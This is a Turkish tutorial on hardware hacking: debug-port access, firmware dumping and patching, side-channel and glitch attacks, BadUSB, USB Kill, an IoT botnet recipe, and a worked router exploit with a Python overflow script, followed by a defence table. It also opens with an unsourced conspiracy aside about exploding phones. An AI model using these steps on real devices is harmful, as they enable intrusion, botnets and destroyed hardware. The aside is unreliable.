1. Hardware (Donanım) Nedir?
Bilgisayarın elle tutulabilen parçalarına donanım denir.(Yeterince exploit , malware , network lpe , vb. gibi alanlarda iyiysenizde robot süpürgenden milleyi dikizleye bilir yada bir telefonu havaya uçarua bilirsiniz bunu yaptığı ida edline şirket var NSO Group ve kendileri savaş başlamadan önce ve başlarında hiz bullahçıların telefonlarını israilile birlikte çalışıp havaya uçurdukları söyleniyor havaya uçurulan telefonlar ve sakat kalan hizbullahçılar var ama tüm sorumluluğu israil alıyor buda genel kültür olarak sizde kalabilir buraya komplo teorileri katagorisi oluşturulsa iyide olabilir he)
Örnekler:
- CPU (işlemci)
- RAM (bellek)
- Anakart
- USB sürücüler
- Ağ kartı
- Router (modem)
- Akıllı telefon
- IoT cihazları (kamera, sensör, akıllı ampul)
2. Hardware Hacking Nedir?
Donanım hacklemek, cihazın içindeki yazılımı (firmware) veya fiziksel devrelerini manipüle ederek, cihazı istediğin gibi çalıştırmaktır.Amaç:
- Cihazı kontrol etmek
- Şifreleri kırmak
- Gizli verileri okumak
- Cihazı tuşlamak (brick)
3. Hardware Hacking Yöntemleri
A) Fiziksel Saldırılar (Donanıma Dokunarak)
1) JTAG / SWD (Debug Port)
- Birçok cihazda "debug" amaçlı bağlantı noktaları vardır.
- Bunları kullanarak cihazın içindeki firmware'i okuyabilir veya değiştirebilirsin.
Cihazı aç.
- Anakart üzerindeki JTAG veya SWD pinlerini bul.
- Uygun bir programlayıcı ile bağlan.
- Firmware'ı dump (kopyala) al.
- İçine shellcode enjekte et veya yetki yükselt.
2) UART (Serial Port)
- Birçok cihazda seri iletişim portu (UART) bulunur.
- Bu port genelde debug konsolu (shell) verir.
- Anakartta TX, RX, GND pinlerini bul.
- USB-TTL dönüştürücü ile bağlan.
- 9600 veya 115200 baud rate ile konsol açılır.
- Doğrudan root shell elde edebilirsin.
3) SPI / I2C (EEPROM Okuma)
- Cihazların ayarlarını veya şifrelerini EEPROM'da saklar.
- SPI veya I2C protokolü ile bu yongayı okuyabilirsin.
- Cihazda SPI/I2C yongasını bul (genelde 8 pinli).
- Logic analyzer veya Bus Pirate ile bağlan.
- Chip'i dump al.
- İçindeki şifreleri veya ayarları oku.
4) Power Analysis (Güç Analizi)
- Cihazın harcadığı akımı analiz ederek şifreleme anahtarını kırabilirsin.
- Cihazın güç hattına bir direnç bağla.
- Osiloskop ile akım dalgalanmalarını ölç.
- Kripto işlemleri sırasında güç tüketimi değişir.
- Bu değişimleri analiz ederek gizli anahtarı bul (Side-Channel Attack).
5) Glitch Attack (Gerilim Anomalisi)
- Cihazın voltajını veya clock sinyalini bozarak bypass yapmak.
- Cihazın güç hattına ani bir voltaj düşüşü uygula.
- Bu sırada cihaz "şifre doğru" diyebilir.
- Veya firmware güncellemesini atlayabilir.
B) Firmware Saldırıları (Yazılımsal)
1) Firmware Reverse Engineering
- Cihazın firmware'ini (yazılımını) dump al ve analiz et.
- JTAG veya SPI ile firmware dump al.
- IDA Pro veya Ghidra ile aç.
- Zafiyetli fonksiyonları bul (buffer overflow, hardcoded şifreler).
- Firmware'ı patch'le veya exploit yaz.
2) Firmware Update Exploitation
- Cihaz firmware güncellemesi yaparken (OTA) saldırı.
- Firmware güncelleme paketini yakala.
- Paketi değiştir (kendi shellcode'unu ekle).
- Cihaza gönder, cihaz senin firmware'ini yüklesin.
3) Hardcoded Credentials (Sabit Şifreler)
- Birçok cihazda varsayılan şifreler (admin:admin) sabit kodlanmıştır.
- Firmware'ı aç.
- String'leri tarama (strings firmware.bin | grep admin)
- Varsayılan şifreleri bul.
- Cihaza gir.
4) UART Shell
- UART üzerinden doğrudan root shell almak.
- UART pinlerini bul.
- USB-TTL ile bağlan.
- Ekranda boot mesajları ve login prompt'u göreceksin.
- Varsayılan şifrelerle gir veya firmware exploit kullan.
C) Side-Channel Saldırıları
1) Timing Attack (Zaman Analizi)
- Şifre kontrolü kaç saniye sürüyor?
- Yanlış şifre gir, ne kadar sürede hata verdiğini ölç.
- Doğru şifre gir, ne kadar sürede doğruladığını ölç.
- Farklı karakterler farklı süreler verir.
- Bu süreleri analiz ederek şifreyi brute force yap.
2) Electromagnetic (EM) Analysis (Elektromanyetik Analiz)
- Cihazın yaydığı elektromanyetik sinyalleri analiz et.
- Probu cihazın yanına yaklaştır.
- Osiloskop veya SDR (Software Defined Radio) ile sinyalleri yakala.
- Kripto işlemleri sırasındaki sinyalleri analiz et.
- Gizli anahtarı bul.
3) Acoustic Attack (Ses Analizi)
- Cihazın çıkardığı sesleri analiz et.
- Yüksek kaliteli mikrofon ile cihazın sesini kaydet.
- FFT (Fourier transform) ile frekansları analiz et.
- Farklı kripto işlemlerinde farklı sesler çıkar.
- Bu seslerden anahtarı çıkar.
D) Ağ Saldırıları
1) Firmware OTA Interception
- OTA (Over-The-Air) güncellemesi yaparken paketi yakala ve değiştir.
- ARP spoofing ile cihaz ile sunucu arasına gir.
- Firmware güncelleme paketini yakala.
- İçine shellcode ekle.
- Cihaza gönder.
2) IoT Botnet
- Güvensiz IoT cihazlarını botnet'e dahil et.
- Varsayılan şifreleri dene (admin:admin, root:root).
- UART/JTAG ile shell al.
- Cihaza kötü amaçlı yazılım yükle.
- Cihazı DDoS botu olarak kullan.
E) USB Hacking
1) BadUSB
- USB sürücüsünün firmware'ini değiştirerek klavye veya ağ kartı gibi davranmasını sağla.
- USB sürücüsünü aç.
- Firmware'ini dump al.
- Firmware'deki USB descriptor'ı değiştir.
- Artık bilgisayara bağlandığında klavye gibi görünür ve komut gönderebilir.
2) USB Kill
- USB portuna yüksek voltaj vererek bilgisayarı fiziksel olarak boz.
- USB portundaki güç hattına 220V ver.
- Anakarttaki kondansatörler patlar.
- Bilgisayar kullanılamaz hale gelir.
F) CPU Saldırıları
1) Meltdown / Spectre
- CPU'nun speculative execution (tahmini çalıştırma) zafiyetleri.
- Kernel bellek alanını (çekirdek) okumak için cache timing attack kullan.
- Meltdown ile çekirdek belleğini doğrudan oku.
- Spectre ile diğer programların bellek alanını oku.
2) Rowhammer
- DRAM'deki (RAM) bitleri flip (ters çevir) yapmak.
- RAM'deki aynı satıra sürekli eriş (okuma/yazma).
- Komşu satırdaki bitler değişir.
- Yetki yükseltme veya şifre kırma.
4. Araçlar (Donanım Hacking)
| Araç | Ne İşe Yarar |
|---|---|
| Bus Pirate | JTAG, SPI, I2C, UART iletişimi |
| J-Link / ST-Link | JTAG/SWD programlayıcı |
| USB-TTL Dönüştürücü | UART bağlantısı |
| Logic Analyzer | Dijital sinyal analizi |
| Osiloskop | Analog sinyal analizi |
| Saleae Logic | Logic analyzer yazılımı |
| SDR (RTL-SDR) | Radyo sinyali yakalama |
| Teensy / Arduino | BadUSB, glitch attack |
| Flashrom | SPI chip okuma/yazma |
| Binwalk | Firmware dump analizi |
| Ghidra / IDA Pro | Firmware reverse engineering |
| Wireshark | Ağ trafiği analizi |
5. Örnek: Router Hackleme (Tam Akış)
Hedef:
- Ev tipi router (TP-Link, D-Link, vs.)
- Zafiyet: Firmware'de hardcoded şifre veya buffer overflow
Adım 1: Firmware'ı Bul
wget https://www.tplink.com/firmware.bin
Adım 2: Firmware'ı Analiz Et
binwalk firmware.bin
binwalk -e firmware.bin
cd _firmware.extracted/
Adım 3: String'leri Tara
strings -n 8 squashfs-root/usr/bin/* | grep -E "(pass|admin|login)"
Bulunabilecekler:
admin:admin
root:123456
passwd:default
http://192.168.1.1
Adım 4: Zafiyetli Fonksiyonu Bul (Ghidra ile)
void login(char *username, char *password) {
char buffer[64];
strcpy(buffer, password); // Sınır yok!
}
Adım 5: Exploit Yaz (Python)
import socket
target = "192.168.1.1"
port = 80
payload = b"A" * 100 + b"\x50\xFF\x12\x00" # Return Address
http_request = f"POST /login HTTP/1.1\r\nHost: {target}\r\nContent-Length: {len(payload)}\r\n\r\n".encode()
http_request += payload
s = socket.socket()
s.connect((target, port))
s.send(http_request)
s.close()
Adım 6: Başarı!
Router shell açtı (reverse shell veya Telnet). Artık router'ı kontrol edebilirsin.6. Hardware Hacking Öğrenme Yolu
- Temel Elektronik: Voltaj, akım, direnç, LED, kondansatör.
- Lehim Yapma: Sıcak hava, havya, flux.
- Multimetre Kullanımı: Voltaj, kısa devre, continuity test.
- Osiloskop Kullanımı: Sinyal görüntüleme, timing analizi.
- Veri Protokolleri: UART, SPI, I2C, JTAG, SWD öğren.
- Firmware Reverse Engineering: Ghidra/IDA ile binary analiz.
- Router/IoT Hackleme: Gerçek cihazlarla pratik yap.
- Side-Channel: SCA, SDR, EM analiz.
7. Güvenlik Önlemleri (Savunma)
| Savunma | Açıklama |
|---|---|
| Secure Boot | Sadece imzalı firmware çalıştır |
| Bootloader Lock | JTAG/UART'ı devre dışı bırak |
| Firmware Encryption | Firmware'ı şifrele (key iyi saklanmalı) |
| Anti-Tamper | Fiziksel saldırıları zorlaştır (epoksi kaplama) |
| Root of Trust | Güvenilir çip (TPM) |
| Regular Updates | Düzenli firmware güncellemeleri |
| Hardcoded Şifre Yok | Varsayılan şifreler olmamalı |